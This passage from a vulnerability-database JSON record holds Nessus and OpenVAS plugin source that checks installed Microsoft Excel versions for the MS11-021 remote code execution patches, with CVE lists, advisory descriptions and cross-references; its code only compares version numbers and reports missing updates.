{"hash": "ecff7fa9fb06dae17a05b3b3cc49bf5d", "key": "sourceData"}, {"hash": "35f671787437d7463153fdc04e473d41", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=53378", "id": "SMB_NT_MS11-021.NASL", "lastseen": "2018-09-01T23:33:54", "modified": "2018-07-30T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "53378", "published": "2011-04-13T00:00:00", "references": ["https://technet.microsoft.com/library/security/MS11-021"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/07/30 15:31:33\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n script_xref(name:\"MSKB\", value:\"2464583\");\n script_xref(name:\"MSKB\", value:\"2466146\");\n script_xref(name:\"MSKB\", value:\"2466156\");\n script_xref(name:\"MSKB\", value:\"2466158\");\n script_xref(name:\"MSKB\", value:\"2466169\");\n script_xref(name:\"MSKB\", value:\"2502786\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "title": "MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)", "type": "nessus", "viewCount": 6}, "differentElements": ["references", "modified", "sourceData"], "edition": 7, "lastseen": "2018-09-01T23:33:54"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "84cda5fc850fc23ca8b34a300dcb0086"}, {"key": "cvelist", "hash": "faedb438011c10b2b3ac9682e0ad6e9a"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "79f17a293f21a006f4d5fb6cc7e3ddf9"}, {"key": "href", "hash": "6f0aa299e212a46ad7694743f103ff67"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "c9898bc973bfffca5119f1a3bfa73a8d"}, {"key": "pluginID", "hash": "c873ceb88c2733918d5085d12ea543fb"}, {"key": "published", "hash": "15bc6dc844e4b9ecee34f343b0fae75b"}, {"key": "references", "hash": "c634e415711c2c395379a3376b7cb08e"}, {"key": "reporter", "hash": "33343e1ae53d3b18311f8f7cae2b7529"}, {"key": "sourceData", "hash": "7f1e40a1c2c26f9b1d7fb1fd6a4ba40b"}, {"key": "title", "hash": "8fe7795fca489b4a41cbd4de490e37d5"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "07a1edfbe52772995648ea30af46fe60d32863cdf24b2ace5f882d37fa0d319d", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:902410", "OPENVAS:1361412562310902410", "OPENVAS:801595", "OPENVAS:1361412562310801595", "OPENVAS:1361412562310801597", "OPENVAS:801597"]}, {"type": "nessus", "idList": ["MACOSX_MS_OFFICE_APR2011.NASL"]}, {"type": "cve", "idList": ["CVE-2011-0979", "CVE-2011-0978", "CVE-2011-0105", "CVE-2011-0098", "CVE-2011-0104", "CVE-2011-0980", "CVE-2011-0097", "CVE-2011-0103", "CVE-2011-0101"]}, {"type": "symantec", "idList": ["SMNTC-47245", "SMNTC-47235", "SMNTC-47244"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11580", "SECURITYVULNS:DOC:26146", "SECURITYVULNS:DOC:26111", "SECURITYVULNS:DOC:26115", "SECURITYVULNS:DOC:26108"]}, {"type": "zdi", "idList": ["ZDI-11-041", "ZDI-11-042", "ZDI-11-121", "ZDI-11-040", "ZDI-11-120"]}, {"type": "seebug", "idList": ["SSV:20487", "SSV:72308", "SSV:20502", "SSV:20507", "SSV:20482", "SSV:20473", "SSV:20484", "SSV:20486"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:106665", "PACKETSTORM:100978"]}, {"type": "saint", "idList": ["SAINT:8FDD1727EA3EF9E282DFCB5EB73BAB71", "SAINT:267E40AEADBF5F2FFB79C86829E9CD8F", "SAINT:CBF7317F9C70B260229D429B6501B612", "SAINT:013CEB50A5B7225D03F444037190A7BC", "SAINT:7B206168EE040415028D1ACACF7854DD", "SAINT:AD5D5006868071901513DB0CC581B4BC"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS11_021_XLB_BOF"]}, {"type": "exploitdb", "idList": ["EDB-ID:35573", "EDB-ID:17227", "EDB-ID:18087"]}], "modified": "2019-12-13T09:17:57"}, "score": {"value": 10.0, "vector": "NONE", "modified": "2019-12-13T09:17:57"}, "vulnersScore": 10.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53378);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2011-0097\",\n \"CVE-2011-0098\",\n \"CVE-2011-0101\",\n \"CVE-2011-0103\",\n \"CVE-2011-0104\",\n \"CVE-2011-0105\",\n \"CVE-2011-0978\",\n \"CVE-2011-0979\",\n \"CVE-2011-0980\"\n );\n script_bugtraq_id(46225, 46226, 46229, 47201, 47235, 47243, 47244, 47245, 47256);\n script_xref(name:\"EDB-ID\", value:\"18067\");\n script_xref(name:\"EDB-ID\", value:\"18087\");\n script_xref(name:\"MSFT\", value:\"MS11-021\");\n script_xref(name:\"MSKB\", value:\"2464583\");\n script_xref(name:\"MSKB\", value:\"2466146\");\n script_xref(name:\"MSKB\", value:\"2466156\");\n script_xref(name:\"MSKB\", value:\"2466158\");\n script_xref(name:\"MSKB\", value:\"2466169\");\n script_xref(name:\"MSKB\", value:\"2502786\");\n\n script_name(english:\"MS11-021: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\");\n script_summary(english:\"Checks version of Excel\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nExcel.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host is running a version of Microsoft Excel or\nExcel Viewer that is affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Excel file, they could leverage this issue to\nexecute arbitrary code subject to the user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-021\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007,\n2010, Excel Viewer, and Office Compatability Pack.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_compatibility_pack\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-021';\nkbs = make_list(\"2464583\", \"2466146\", \"2466156\", \"2466158\", \"2466169\", \"2502786\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninfo = \"\";\n\n\n# Excel.\nvuln = 0;\ninstalls = get_kb_list(\"SMB/Office/Excel/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/Excel/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel 2010.\n office_sp = get_kb_item(\"SMB/Office/2010/SP\");\n if (\n (!isnull(office_sp) && office_sp == 0) &&\n (\n (ver[0] == 14 && ver[1] == 0 && ver[2] < 5130) ||\n (ver[0] == 14 && ver[1] == 0 && ver[2] == 5130 && ver[3] < 5003)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2010' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.0.5130.5003\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:'2466146');\n }\n # Excel 2007.\n office_sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (\n (!isnull(office_sp) && office_sp == 2) &&\n (\n (ver[0] == 12 && ver[1] == 0 && ver[2] < 6550) ||\n (ver[0] == 12 && ver[1] == 0 && ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2007' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2464583\");\n }\n # Excel 2003.\n office_sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 8332)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2003' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.0.8332.0\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2502786\");\n }\n # Excel 2002.\n if (\n (!isnull(office_sp) && office_sp == 3) &&\n (ver[0] == 10 && ver[1] == 0 && ver[2] < 6869)\n )\n {\n vuln++;\n info =\n '\\n Product : Excel 2002' +\n '\\n File : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 10.0.6869.0\\n';\n\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466169\");\n }\n }\n}\n\n# Excel Viewer.\ninstalls = get_kb_list(\"SMB/Office/ExcelViewer/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelViewer/' - '/ProductPath';\n path = installs[install];\n path = 'n/a';\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Excel Viewer.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : Excel Viewer' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466158\");\n break;\n }\n }\n}\n\n\n# 2007 Microsoft Office system and the Microsoft Office Compatibility Pack.\ninstalls = get_kb_list(\"SMB/Office/ExcelCnv/*/ProductPath\");\nif (!isnull(installs))\n{\n foreach install (keys(installs))\n {\n version = install - 'SMB/Office/ExcelCnv/' - '/ProductPath';\n path = installs[install];\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # 2007 Office system and the Office Compatibility Pack.\n if (\n ver[0] == 12 && ver[1] == 0 &&\n (\n ver[2] < 6550 ||\n (ver[2] == 6550 && ver[3] < 5004)\n )\n )\n {\n vuln++;\n info =\n '\\n Product : 2007 Office system and the Office Compatibility Pack' +\n '\\n File : '+ path +\n '\\n Installed version : '+ version +\n '\\n Fixed version : 12.0.6550.5004\\n';\n hotfix_add_report(info, bulletin:bulletin, kb:\"2466156\");\n break;\n }\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "53378", "cpe": ["cpe:/a:microsoft:excel_viewer", "cpe:/a:microsoft:office", "cpe:/a:microsoft:excel", "cpe:/a:microsoft:office_compatibility_pack"], "scheme": null}
{"openvas": [{"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-021.", "modified": "2019-05-03T00:00:00", "published": "2011-04-13T00:00:00", "id": "OPENVAS:1361412562310902410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902410", "title": "Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902410\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-04-13 17:05:53 +0200 (Wed, 13 Apr 2011)\");\n script_cve_id(\"CVE-2011-0097\", \"CVE-2011-0098\", \"CVE-2011-0101\", \"CVE-2011-0103\",\n \"CVE-2011-0104\", \"CVE-2011-0105\", \"CVE-2011-0978\", \"CVE-2011-0979\",\n \"CVE-2011-0980\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2466146\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2466169\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2502786\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2466158\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/0940\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\", \"secpod_ms_office_detection_900025.nasl\");\n script_mandatory_keys(\"SMB/Office/Excel/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a malicious Excel file.\");\n script_tag(name:\"affected\", value:\"Microsoft Excel Viewer Service Pack 2\n\n Microsoft Office Excel 2002 Service Pack 3\n\n Microsoft Office Excel 2003 Service Pack 3\n\n Microsoft Office Excel 2007 Service Pack 2\n\n Microsoft Office Excel 2010\");\n\n script_tag(name:\"insight\", value:\"The flaws are caused by memory corruption, heap and integer overflows, buffer\n overwrite, array indexing, and dangling pointers when parsing malformed data or\n records within Excel documents, which could be exploited by attackers to execute\n arbitrary code by tricking a user into opening a specially crafted Excel file.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS11-021.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nexcelVer = get_kb_item(\"SMB/Office/Excel/Version\");\nif(excelVer =~ \"^1[0124]\\.0\")\n{\n if(version_in_range(version:excelVer, test_version:\"10.0\", test_version2:\"10.0.6868.0\") ||\n version_in_range(version:excelVer, test_version:\"11.0\", test_version2:\"11.0.8331.0\") ||\n version_in_range(version:excelVer, test_version:\"12.0\", test_version2:\"12.0.6550.5003\") ||\n version_in_range(version:excelVer, test_version:\"14.0\", test_version2:\"14.0.5130.5002\"))\n {\n report = report_fixed_ver(installed_version:excelVer, vulnerable_range:\"10.0 - 10.0.6868.0, 11.0 - 11.0.8331.0, 12.0 - 12.0.6550.5003, 14.0 - 14.0.5130.5002\");\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexcelVer = get_kb_item(\"SMB/Office/XLView/Version\");\nif(excelVer && excelVer =~ \"^12\\.0\")\n{\n if(version_in_range(version:excelVer, test_version:\"12.0\", test_version2:\"12.0.6550.5003\")){\n report = report_fixed_ver(installed_version:excelVer, vulnerable_range:\"12.0 - 12.0.6550.5003\");\n security_message(port:0, data:report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:40", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-021.", "modified": "2017-02-20T00:00:00", "published": "2011-04-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902410", "id": "OPENVAS:902410", "title": "Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-021.nasl 5362 2017-02-20 12:46:39Z cfi $\n#\n# Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a malicious Excel file.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Excel Viewer Service Pack 2\n Microsoft Office Excel 2002 Service Pack 3\n Microsoft Office Excel 2003 Service Pack 3\n Microsoft Office Excel 2007 Service Pack 2\n Microsoft Office Excel 2010\";\ntag_insight = \"The flaws are caused by memory corruption, heap and integer overflows, buffer\n overwrite, array indexing, and dangling pointers when parsing malformed data or\n records within Excel documents, which could be exploited by attackers to execute\n arbitrary code by tricking a user into opening a specially crafted Excel file.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-021.\";\n\nif(description)\n{\n script_id(902410);\n script_version(\"$Revision: 5362 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 13:46:39 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-13 17:05:53 +0200 (Wed, 13 Apr 2011)\");\n script_cve_id(\"CVE-2011-0097\", \"CVE-2011-0098\", \"CVE-2011-0101\", \"CVE-2011-0103\",\n \"CVE-2011-0104\", \"CVE-2011-0105\", \"CVE-2011-0978\", \"CVE-2011-0979\",\n \"CVE-2011-0980\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2466146\");\n script_xref(name : 